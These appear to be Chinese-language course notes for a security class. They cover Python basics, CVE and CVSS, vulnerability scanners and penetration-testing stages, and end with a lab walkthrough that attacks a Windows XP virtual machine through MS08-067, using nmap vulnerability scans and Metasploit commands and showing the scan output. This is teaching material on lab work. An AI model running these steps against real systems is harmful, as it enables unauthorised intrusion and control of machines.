# 資安實務🔒
## 課堂講義連結
[Python-if](http://gg.gg/hhh-week02)
[Python-重複結構](http://gg.gg/hhh-week03)
[Python-資料型別](http://gg.gg/hhh-week04)
[Linux](http://gg.gg/hhh-linux)
[Pwntool](http://gg.gg/hhh-pwn)
[Crypto-密碼學](http://gg.gg/hhh-crypto)
[System Security-系統安全](http://gg.gg/hhh-system)
# Python
---
## 基本資料型態
|整數|int|
|-----|--------|
|浮點數(小數)|float|
|布林值(True/False)|bool|
|字串|str|
---
## 輸出
## print語法:
### ==print("輸出",sep=分隔字元,end=結束字元)==
- #### 1. sep (分隔字元) 預設為空白字元
- #### 2. end (結束字元) 預設為換行字元\n
- \n = 換行字元
- \t = 水平跳格字元(Tab)
- \b = 倒退一格字元(Backspace)
### ==print( 字串 %(參數) )==
#### %s 代表字串、%d 代表整數、%f 代表浮點數
在%和s,d,f之間加數字可控制格式
- 如:
- "%10s" = 總共10個格子,扣掉字數後的空格擺前面
- "%-10s" = 總共10個格子,扣掉字數後的空格擺後面
- "%0.2f" = 兩位小數,沒有小數的話自動補0
---
## If
### ==if :==
- 不成立,跳下一個
### ==elif :==
- 不成立,再跳下一個
### ==else :==
- 上述都不成立,最後一個
---
## for 迴圈
### ==for 變數 in range(起始值,終止值,遞增值):==
- 沒有起始值或遞增值時,該數值預設為終止值
- 起始值預設為0,遞增值預設為1
- 起始值 ≤ range( )的範圍 < 終止值
---
## while
### ==while (條件式):==
- 會一直執行到條件式不成立
---
# 系統安全🔐
## 漏洞:
:::warning
## 揭露平台: [CVE](https://www.cvedetails.com/index.php)
- #### 漏洞編號說明: 例:<font color="#f00">MS</font><font color="#BB18E2">08</font><font color="#593BD8">-067</font>
----> <font color="#f00">MS</font> 是<font color="#f00">Microsoft</font>的縮寫
----> <font color="#BB18E2">08</font> 代表<font color="#BB18E2">2008</font>年
----> <font color="#593BD8">-067</font> 第<font color="#593BD8">67</font>個漏洞
## 評分系統:CVSS
- #### 評分等級:有1~10分,10分最高
:::
## 安全強化🛡:
- #### 漏洞掃描:
- 常見系統服務漏洞掃描
- OpenVAS
- Nessus
- Rapid Nexpose
- 常見網站漏洞掃描
- Acunetix Web Vulnerability Scanner(AWVS)
- #### 滲透測試:
- **意旨**: 滲透測試是企業委託駭客對系統進行入侵攻擊,並在攻擊後回報潛在漏洞給開發人員做修補。
- **步驟**:
1. ==偵查、資料收集 Reconnaissance & Information Gathering:==
2. ==掃描 Scanning:==
- 掃描目標主機,以確定進攻手段
3. ==滲透(漏洞利用Vulnerability Exploitation):==
- 利用前面掃瞄到的漏洞,來取得目標主機的控制權
4. ==提權Privilege Escalation:==
- 當獲得到的初始shell為低許可權的使用者時,需要想辦法提升許可權成為高許可權使用者,這個過程就叫做"提權"
5. ==產出報告、顧問服務Output report & Consultancy Services:==
- 將可攻擊的漏洞、解決方法整理成一份報告交給雇主,並提供相關顧問服務
## Windows XP 實際滲透測試🗡
### 1.使用 ==NMAP== 執行掃描
:::info
## <font color="#2977CC">NMAP介紹</font>
>✔NMAP是一個用於情資蒐集的網路掃描器。
>✔基本原理:Nmap發送特製的封包至目標主機,然後分析其反應。
>✔Nmap有許多功能,可用來探測網路,包括目標偵測和服務偵測以及作業系統偵測。
>✔NMAP提供更高階的腳本漏洞檢測(NSE, nmap script engineering)。
:::
>
### 2.使用 ==nmap --script vuln <IP>== 做漏洞掃描
>
>*紅色框內的CVE及為可攻擊的漏洞編號*
### 3.使用 Metasploit 來利用漏洞進行攻擊
:::info
## <font color="#2977CC">Metasploit Frame Console 指令介紹</font>
|指令|說明|
|----|----|
|help|列出簡單說明以及可用的指令|
|search|用來找可攻擊的漏洞,如:<font color="f00">search ms08-067</font>
|show|顯示各種模組或者顯示各種攻擊所需參數(show options)|
|set|設定各種參數,如: <font color="f00">set RHOSTS 10.2.0.99 (設定肉雞方IP)</font>|
|use|使用某個特定exploit模組,如:<font color="f00">use exploit/windows/smb/ms08_067_netapi</font>|
|exploit|進行攻擊 (所有參數設定完成,即可進行攻擊)|
|exit|離開msfconsole 返回到 linux主場
:::
>*進入*
>
>*尋找攻擊程式碼*
>
>*使用攻擊碼程式*
>
>*設定參數*
>
>*攻擊*
>
>這樣就已攻擊完成,可以控制目標電腦
### 4.使用 ==screen -p ( path )== 取得目標電腦的螢幕截圖
- path-->打上要儲存圖片的位子
### 5.離開滲透攻擊環境 =>==exit==

```
roof kall:-# nmap -script vuln 10.0.2.99
starting Nmap 7.70 T https://nmap.org ) at 2021-12-23 22:57 EST
mass dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using systems of
specify valid servers with ..dns-servers
Nmap scan report for 10.0.2.99
Host is up (0.000135 latency).
Not shown: 997 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-san
445/tcp open microsoft.ds
MAC Address: 08:00:27:20:46:5B (Oracle VirtualBox virtual NIC)
Host script results:
samba-vuln-cve-2012- 1182: NT STATUS ACCESS DENIED
smb. vuln.ms 08-067:
VULNERABLE:
Microsoft Windows system vulnerable to remote code execution (MS08-067)
State: VULNERABLE
IDs: CVE:CVE-2008-4250
The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2
Vista Gold and Spi, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
code via a crafted RPC request that triggers the overflow during path canonicalization,
Disclosure date: 2008-10-23
References:
https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
smb-vuln-ms 10-054: false
smb-vuln-ms 10-061: ERROR: Script execution failed (use -d to debug)
Smb-vuln-ms17-010:
VULNERABLE:
Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms 17-010)
State: VULNERABLE
IDS: CVE:CVE-2017-e143
Risk factor: HIGH
A critical remote code execution vulnerability exists in Microsoft SMBv1
servers (ms17-010).
Disclosure date: 2017-03-14
References:
https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
map done: 1 IP address (1 host up) scanned in 16.96 seconds
```